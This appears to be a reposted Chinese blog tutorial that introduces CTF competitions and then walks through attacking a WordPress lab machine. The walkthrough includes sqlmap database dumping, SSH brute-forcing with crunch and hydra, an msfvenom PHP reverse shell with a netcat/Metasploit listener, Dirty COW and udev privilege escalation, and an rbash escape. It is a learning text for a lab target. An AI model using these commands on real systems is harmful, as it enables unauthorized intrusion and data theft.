各种类型网络安全竞赛有哪些 网络安全大赛的简称

news2025/2/28 20:52:02

本文是对入门学习的一些概念了解和一些常规场景记录

1.CTF(capture the flag)是夺旗赛的意思。

是网络安全技术人员之间进行攻防的比赛。
起源1996年DEFCON全球黑客大会,替代之前真实攻击的技术比拼。
(DEFCON极客大会诞生1993,每年7月在拉斯维加斯举行)
有黑客比赛的世界杯的说法。
CTF竞赛已成为安全圈最流行竞赛模式。
    国际知名赛事
    DEFCON CTF:CTF赛事中的“世界杯”
    UCSB iCTF:来自UCSB的面向世界高校的CTF
    Plaid CTF:包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛 
    Boston Key Party:近年来崛起的在线解题赛
    Codegate CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元
    Secuinside CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元
    XXC3 CTF:欧洲历史最悠久CCC黑客大会举办的CTF
      国内知名赛事
      XCTF联赛:是国内最权威、最高技术水平与最大影响力的网络安全CTF赛事平台。
      (国内,亚洲最大竞赛。清华蓝莲花战队发起)
      强网杯:国家级安全比赛,网信办网络安全协调局指导。
      红帽杯:广东公安厅,计算机网络安全协会举办
      AliCTF:阿里
      TCTF:腾讯
      BCTF:百度
      WCTF:世界大赛邀请制,360
      HCTF:杭州电子科技大学信息安全协会
      ISCC:全国大学生,北理工

        2.竞赛模式:

        1.解题模式(jeopardy风险,危险)
        通常是线上参与,网络安全技术的题目。
        题目包含:逆向,漏洞挖掘和利用,web渗透,密码,取证,隐写,安全编程等类型。
           2.攻防模式(attack&defense)
          互相攻击防守,挖掘漏洞攻击和修复漏洞防守。
            3.混杂模式(mix)
            解题和攻防模式结合,典型赛事iCTF。

              3.题目类型

              3.1.reverse(逆向)
              涉及逆向分析能力:软件逆向,破解技术,反汇编和反编译技术。
              知识:汇编语言,加解密,反编译工具等。
                3.2.Pwn(破解)
                pwn发音砰,破解的意思,主要溢出漏洞(堆和栈溢出等)。
                涉及对二进制漏洞挖掘和利用能力。
                知识:c/c++,OD+IDA,数据结构,操作系统,汇编原理。
                (CE(CheatEngine)用来定位数据,OD(ollydbg)用来动态调试,IDA(Interactive Disassembler)用来看代码)
                  3.3.web(web安全)
                  web站点漏洞挖掘和利用:XSS,文件包含,代码执行,上传漏洞,sql注入等。
                  以及数据包的构造和响应,tcp/ip协议。
                  知识:PHP,JSP, JAVA, Python,TCP/IP,SQL,OWASP TOP 10

                    3.4.crypto(加解密)

                    涉及密码学相关技术,加解密技术,编码解码技术。
                    知识:数论,矩阵,密码学。

                      3.5.misc(杂项)

                      安全相关:信息收集,隐写,流量分析,数字取证,编码转换。
                      知识:隐写术,wireshark流量分析审查等工具使用,编码。
                        3.6.mobile(移动)
                        涉及APP漏洞挖掘和利用:iPhone和Android系统,以Android的apk破解为主。
                        知识:Android

                        4.学习建议:

                        可以刷题或者靶机练习,以web安全作为学习入口是不错选择。

                        XCTF(攻防世界)
                        Bugku CTF  
                        Jarvis OJ  
                        ctf.show 
                        BUUCTF  
                        CTFHub

                          各种类型网络安全竞赛有哪些 网络安全大赛的简称_php

                           词汇简介:POC,EXP,CVE,CVSS
                          POC(Proof of Concept)
                          漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在
                          
                          EXP(Exploit)
                          漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本)
                          
                          0DAY
                          含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。
                          
                          CVE(Common Vulnerabilities & Exposures)
                          公共漏洞和暴露,信息安全漏洞公共的名称。
                          使用一个共同的名字,可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题 。

                            5.靶机实战:拿下wordpress提权

                            测试环境:
                            kali攻击机和WordPress系统的靶机。
                            WordPress是一款个人博客框架属于内容管理系统(CMS)使用PHP语言和mysql数据库架设。
                              攻击过程:
                              信息收集,漏洞挖掘,漏洞利用,权限提升。

                                5.1.信息收集

                                包括:主机,ip,端口,服务,操作系统,目录等扫描收集及社工。
                                1.主机发现工具:arp-scan netdiscover fping等。
                                arp-scan -l //局域网扫描
                                netdiscover -i eth0 -r 192.168.133.0/24 //网段扫描
                                通过mac地址得到厂商。
                                
                                2.端口扫描工具:nmap
                                -A:全面探测(aggressive(进攻性)) -sS:SYN扫描(半连接) -sV:显示版本 -v:显示vebose详细过程 
                                -p-:全端口(1-65535) -T4:延迟级别,放弃超时10ms
                                nmap -sS -sV -v -p- -T4  192.168.12.1
                                nmap -A ip
                                nmap -A -sS -sV -v -p- -T4  192.168.12.1
                                
                                常见端口和服务:
                                22:ssh 25:smtp 80:http 111:RPCINFO服务 443:HTTPS服务
                                624:PRC 3306:MYSQL
                                
                                
                                3.信息收集目标就是威胁建模
                                (简单来说就是猜测服务可能存在攻击方式和漏洞)
                                对于web服务主要收集:服务和系统的名称和版本。
                                可以利用谷歌浏览器Wappalyzer插件收集:系统和服务的版本信息
                                WordPress版本,操作系统,数据库类型,PHP版本
                                
                                web地址的参数或者表单验证是否可sql注入,
                                一般首页是没有参数的,选择注册页或者可传参数的页面
                                比如xx?id=1 
                                后面加个冒号:xxx?id=1' 
                                后面加 and 1=1 后者and 1=2:id=1 and 1=1 或者id=1 and 1=2
                                and sleep(5)
                                
                                根据响应页面的内容对比判断是否存在注入点。
                                一般使用工具sqlmap更方便
                                
                                ssh尝试弱口令爆破
                                工具:九头蛇 美杜莎
                                
                                4.目录扫描:dirb,dirbuster,gobuster,御剑等工具。nikto。
                                对于web目录扫描是关键步骤,甚至首步骤。
                                作用:敏感目录和敏感文件可能泄露(管理页面,遗留文件)。

                                   发现管理后台,数据库管理页面。

                                  5.2.漏洞挖掘
                                  几种方式:
                                  1.对于管理后台尝试:
                                  弱口令(默认密码,常用密码),
                                  暴力破解(工具:burp爆破,PHPmyadmin爆破)。
                                  比如phpmyadmin(数据库网页管理工具的主页)
                                  
                                  2.链接的参数注入
                                  工具:sqlmap参数:-u:url --dbs:爆破数据库 -D:指定数据库 --tables:爆破数据表 -T:指定表 --columns:爆破字段 -C:指定字段(可多个) --dump :脱库
                                  sql注入检测:sqlmap -u "http://xxx?id=1" 
                                  得到数据库,web服务器,操作系统类型和版本以及具体库
                                  sql注入检测:sqlmap -u "http://xxx?id=1"  --dbs
                                  得到哪些库
                                  sqlmap -u "xxx?id=1" --dbs -D xx --tables
                                  得到爆破xx库的表
                                  sqlmap -u "xxx?id=1" --dbs -D xx --tables -T xx --columns
                                  得到爆破的字段
                                  sqlmap -u "xxx?id=1" --dbs -D xx --tables -C xx,xx,xx --dump
                                  得到爆破字段的内容
                                  
                                  有时需要cookie(登陆后)才能sqlmap扫描参数:
                                  获取cookie:浏览器开发者网络查看或者控制台(输入document.cookie获取)
                                  sqlmap -u "http://xxx?id=1" -p id --cookie="xxx=xxxxxxxx" --dbs
                                  
                                  通过爆破可能得到账号和密码,如果服务支持ssh,可以尝试连接
                                  >ssh xx用户@ipxxxx
                                  >密码xxx
                                  (制作密码字典工具以及破解:crunch ;hydra 。
                                  比如:crunch 8 8 -t admin%%@@ -o dic.txt //8 8:最小8位最大八位 -t:占位符 %数字 @小写字母 -o:输出文件
                                  暴力破解ssh:
                                  hydra -l guest -P dic.txt xx.xx.ip ssh
                                  3.网页前端源码查看
                                  是否只是前端验证。
                                  
                                  4.nikto可对web服务器全面漏洞扫描:服务器cgi和项目及配置等
                                  cgi通用网关接口:网页原本是静态的,通过cgi脚本进行处理生成页面返回给浏览器形成动态交互网页,类似servelet。
                                  有时候指服务器,有时候 指cgi语言。
                                  nikto -h http://xxx 
                                  得到一些敏感目录和文件,比如源码b备份,sql等
                                  分析源码获得漏洞,获取管理员账号等

                                    拿到网站管理员权限:密码破解获得数据库管理权限以及后台管理员

                                    5.3.漏洞利用
                                    1.利用MSF生成反弹shell(木马)
                                    msfvenom -p php/meterpreter/reverse_tcp LHOST=自己主机ip LPORT=4444 -o Desktop/shell.php
                                    生成php网页木马,让目标连接自己主机
                                    kali自带php马:/usr/share/webshells/php/php-reverse-sell.php
                                    
                                    2.上传马
                                    将马页面放到php执行目录,或者写入可执行某个页面。
                                    
                                    3.监听原先木马设置端口以建立链接
                                    几种方式:
                                    1)netcat工具:类似工具:中国菜刀
                                    nc -nlvp 4444
                                    2)msf
                                    msf>use exploit/multi/handler
                                    >set playload php/meterpreter_reverse_tcp
                                    >set lhost ip
                                    >exploit
                                    执行后会形成一个会话session,ctr+c可退出,
                                    输入:session 1进入会话:
                                    meterpreter>
                                    
                                    linux查看监听:netstat -tunlp
                                    
                                    4.得到shell
                                    访问马页面,监听程序得到反弹shell.
                                    此时这个shell是web服务器的权限也就是Apache服务器权限。
                                    whoami ;查看当前权限
                                    uname -a : 查看linux系统内核版本
                                    
                                    如果使用msf监听那么执行exploit,连接建立后会得到shell
                                    meterpreter>
                                    输入:sysinfo 查看系统版本信息,
                                    输入:shell 生成交互shell
                                    还可以切换不同样式的shell:交互更友好:
                                    python -c 'import pty;pty.spawn("/bin/bash")'
                                    (common shell和 meterpreter shell区分
                                    有些连接得到是common shell 使用ctr+z 
                                    然后:y 让当前shell隐藏回到msf界面,
                                    使用session -l :查看所有会话shell,每个会话有个id。
                                    session -u 某id:将某会话从common变成meterpreter
                                    session -i 某id :进入某id会话
                                    )
                                    
                                    
                                    5.权限提升,获取root权限
                                    1).漏洞脏牛(dirty cow,CVE-2016-5195)对Linux内核>=2.6.22版本(2007年发布)本地提权,直到2016.10才修复。
                                    原理:内核的内存子系统在处理写入复制时(copy-on-write)产生了竞争条件,利用执行顺序异常,对只读内存映射进行写入,获得root权限。
                                    github官方提供exp
                                    2).漏洞udev(cve2009-1185 linux2.6的一个提权漏洞)
                                    searchsploit linux udev (漏洞库搜索udev漏洞的exp)
                                    /usr/share/exploitdb/platforms/linux/local/8478.sh
                                    
                                    exp在靶机执行需要先获取执行文件,还的添加执行权限。
                                    提供一个传送地址的几种方式:
                                    1).sh放在/tmp下,并执行:python -m SimpleHTTPServer 80
                                    目标主机获取:wget http://xx/xx.sh
                                    查看进程:cat /proc/net/netlink 
                                    在特定进程执行udev
                                    
                                    思路:知道漏洞,找到漏洞exp。

                                      补充:低权限rbash提升(绕过)

                                      当用guest用户登陆系统:ssh gust@xx.xx.xx.ip
                                      得到的shell可能权限非常低很多命令不能使用
                                      当前是rbash解析命令:
                                      echo $PATH:查看当前path。
                                      输出:/home/guest/prog
                                      输入命令会先到path目录下查找,存在才会直接执行,否则需要输入全路径才行执行。
                                      
                                      echo $PATH/*:查看可以直接执行的命令
                                      输出:/home/guest/prog/vi
                                      即表面可以直接执行vi。
                                      进入vi:
                                      :!/bin/bash //!在命令前面表示调用外部命令,在命令后面(wq!)表示强制执行。
                                      执行后命令使用bash来解析。
                                      (sudo以管理员运行,su切换用户,sudo su 切换到管理员)
                                      执行sudo su 显示找不到命令sudo
                                      某目录查找命令:
                                      ls -la /bin/sudo
                                      ls -la /sbin/sudo
                                      ls -la /usr/bin/sudo //确定sudo位置
                                      修改环境变量:
                                      export PATH=$PATH:/usr/bin/sudo
                                      查看当前path:
                                      echo $paht
                                      查找将su命令路径添加到环境:
                                      ls -la /bin/su //确认位置
                                      修改path:
                                      export PATH=$PATH:/bin/su
                                      接下可以执行:sudo su(需要有密码)

                                        5.4.如何防御:

                                        登录后复制 

                                        1.关闭多余端口,最小原则。
                                        2.使用cms等系统,修改默认后台路径。
                                        3.数据管理PHPmyadmin修改默认路径和密码。
                                        4.升级操作系统版本,及时打补丁修复漏洞。
                                        5.关注最新漏洞情报,提升安全运维响应能力。

                                         

                                          网络安全学习路线

                                          对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

                                          同时每个成长路线对应的板块都有配套的视频提供:

                                          需要网络安全学习路线和视频教程的可以在评论区留言哦~

                                          最后
                                          • 如果你确实想自学的话,我可以把我自己整理收藏的这些教程分享给你,里面不仅有web安全,还有渗透测试等等内容,包含电子书、面试题、pdf文档、视频以及相关的课件笔记,我都已经学过了,都可以免费分享给大家!

                                          给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。

                                          黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)

                                          结语

                                          网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。

                                          特别声明:
                                          此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失

                                          本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2307553.html

                                          如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

                                          相关文章

                                          包子凑数——蓝桥杯真题Python

                                          包子凑数 输入输出样例 示例 1 输入 2 4 5输出 6样例说明 凑不出的数目包括:1, 2, 3, 6, 7, 11。 示例 2 输入 2 4 6输出 INF样例说明 所有奇数都凑不出来,所以有无限多个 运行限制 最大运行时间:1s最大运行内存: 256M 最大公约数 最大公…

                                          网络通信/IP网络划分/子网掩码的概念和使用

                                          文章目录 概述子网的考题子网掩码的历史有/无类地址子网划分!子网掩码超网技术/CIDR子网掩码和路由IP子网掩码定义 网络规划网络规划-拆子网网络规划-组超网子网划分案例 区分于其他特殊IP地址IP地址和网络地址子网掩码和网络地址子网掩码和广播地址 子网间的通信其他 概述 本…

                                          MySQL--》如何在MySQL中打造高效优化索引

                                          目录 初识索引 索引结构 性能分析 索引使用 最左前缀法则 SQL提示使用 覆盖索引使用 前缀索引使用 索引失效情况 初识索引 索引(index):是帮助MySQL高效获取数据的数据结构(有序),在数据之外数据库系统还维护着满足特定查找算法的数据结构&…

                                          盛京开源社区加入 GitCode,书写东北开源生态新篇章

                                          在数字化转型与开源技术蓬勃发展的浪潮下,开源社区已成为推动技术创新的核心力量。盛京开源社区(SJOSC)作为沈阳地区的开源交流平台,始终致力于连接开发者、企业及高校,构建区域技术生态圈。 现在,盛京开源…

                                          网络运维学习笔记(DeepSeek优化版)005网工初级(HCIA-Datacom与CCNA-EI)链路层发现协议与VLAN技术

                                          文章目录 一、链路层发现协议1.1 思科CDP协议1.2 华为LLDP协议 二、VLAN(Virtual Local Area Network,虚拟局域网)技术详解2.1 基本概念2.2 技术特性2.3 接口工作原理2.3.1 Access模式2.3.2 Trunk模式 2.4 厂商配置对比思科配置华为配置 2.5 …

                                          DeepSeek开源周Day4:三连发!突破 AI 训练瓶颈的立体解决方案,并行计算三剑客DualPipe、EPLB与Profile-data

                                          项目地址: https://github.com/deepseek-ai/DualPipehttps://github.com/deepseek-ai/eplbhttps://github.com/deepseek-ai/profile-data 开源日历:2025-02-24起 每日9AM(北京时间)更新,持续五天 (4/5)! ​ ​ 一、背景概述 …

                                          树莓百度百科更新!宜宾园区业务再添新篇

                                          树莓集团宜宾园区业务不断拓展,主要体现在以下几个方面: 产业布局 -聚焦数字经济核心领域:涵盖软件开发、人工智能、大数据等,吸引众多上下游企业入驻,形成从芯片研发、软件开发到系统集成的完整产业链条。 -推进“双…

                                          RabbitMQ操作实战

                                          1.RabbitMQ安装 RabbitMQ Windows 安装、配置、使用 - 小白教程-腾讯云开发者社区-腾讯云下载erlang:http://www.erlang.org/downloads/https://cloud.tencent.com/developer/article/2192340 Windows 10安装RabbitMQ及延时消息插件rabbitmq_delayed_message_exch…

                                          OpenWebUI配置异常的外部模型导致页面无法打开

                                          一、使用Ollama关闭OpenAI OpenWebUI自带OpenAI的API设置,且默认是打开的,默认情况下,启动后,会不断的去连https://api.openai.com/v1,但是无法连上,会报错,但是不会影响页面,能正常…

                                          鸿蒙兼容Mapbox地图应用测试

                                          鸿蒙Next已经发布一段时间了,很多之前的移动端地图应用,纷纷都要求适配鸿蒙Next。作为开发者都清楚,所谓的适配其实都是重新开发,鸿蒙的开发语言和纯前端的Javascript不同,也可以Android原始开发的语言不同。鸿蒙自带的…

                                          java练习(45)

                                          ps:题目来自力扣 两数相除 给你两个整数,被除数 dividend 和除数 divisor。将两数相除,要求 不使用 乘法、除法和取余运算。 整数除法应该向零截断,也就是截去(truncate)其小数部分。例如,8.345 将被截断…

                                          部署Flink1.20.1

                                          1、设置环境变量 export JAVA_HOME/cluster/jdk export CLASSPATH.:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib/dt.jarp #export HIVE_HOME/cluster/hive export MYSQL_HOME/cluster/mysql export HADOOP_HOME/cluster/hadoop3 export HADOOP_CONF_DIR$HADOOP_HOME/etc/hadoop …

                                          影视后期工具学习之PR

                                          pr剪辑之旅 第一节课 入门基础知识 1.了解影视基础术语 2.PR面板&首选项设置 首选项需要设置的选项: 自动保存: 修剪: 媒体: 媒体缓存: 经典面板设置,可以根据个人喜好做出改变: 3.展示与准备工作 新建序列:1.横板序列 2.竖版序列:</

                                          浏览器JS打不上断点,一点就跳到其他文件里。浏览器控制台 js打断点,指定的位置打不上断点,一打就跳到其他地方了。

                                          关闭JavaScript 源代码映射&#xff0c;F12开发者模式 设置->偏好设置->源代码/来源->JavaScript 源代码映射。 肯定不是这个原因导致的&#xff0c;但这个办法可以暂时解决问题&#xff0c;点完这个东西就隐藏了webpack&#xff0c;有懂的来讲讲。 又浪费一个小时…

                                          XXE漏洞:原理、危害与修复方法详解

                                          目录 一、XXE漏洞概述二、XXE漏洞原理三、XXE漏洞危害1. 任意文件读取2. 命令执行3. 拒绝服务攻击(DoS)4. SSRF攻击四、XXE漏洞修复方法1. 禁用外部实体JavaPythonPHP2. 输入验证和过滤3. 安全配置服务器4. 升级解析器版本五、总结一、XXE漏洞概述 XXE(XML External Entity…

                                          DeepSeek-R1:通过强化学习激发大语言模型的推理能力

                                          注&#xff1a;此文章内容均节选自充电了么创始人&#xff0c;CEO兼CTO陈敬雷老师的新书《自然语言处理原理与实战》&#xff08;人工智能科学与技术丛书&#xff09;【陈敬雷编著】【清华大学出版社】 文章目录 DeepSeek大模型技术系列三DeepSeek大模型技术系列三》DeepSeek-…

                                          Xcode如何高效的一键重命名某个关键字

                                          1.选中某个需要修改的关键字&#xff1b; 2.右击&#xff0c;选择Refactor->Rename… 然后就会出现如下界面&#xff1a; 此时就可以一键重命名了。 还可以设置快捷键。 1.打开Settings 2.找到Key Bindings 3.搜索rename 4.出现三个&#xff0c;点击一个地方设置后其…

                                          smolagents学习笔记系列(八)Examples - Master you knowledge base with agentic RAG

                                          这篇文章锁定官网教程中 Examples 章节中的 Master you knowledge base with agentic RAG 文章&#xff0c;主要介绍了如何将 agent 和 RAG 结合使用。 官网链接&#xff1a;https://huggingface.co/docs/smolagents/v1.9.2/en/examples/rag&#xff1b; Agentic RAG 在之前的…

                                          数据挖掘工程师的技术图谱和学习路径

                                          数据挖掘工程师的技术图谱和学习路径: 1.基础知识 数据挖掘工程师是负责从大量数据中发现潜在模式、趋势和规律的专业人士。以下是数据挖掘工程师需要掌握的基础知识: 数据库知识:熟悉关系数据库和非关系数据库的基本概念和操作,掌握SQL语言。 统计学基础:了解统计学的基…

                                          Redis源码剖析之GEO——Redis是如何高效检索地理位置的?

                                          Redis GEO 用做存储地理位置信息&#xff0c;并对存储的信息进行操作。通过geo相关的命令&#xff0c;可以很容易在redis中存储和使用经纬度坐标信息。Redis中提供的Geo命令有如下几个&#xff1a; geoadd&#xff1a;添加经纬度坐标和对应地理位置名称。geopos&#xff1a;获取…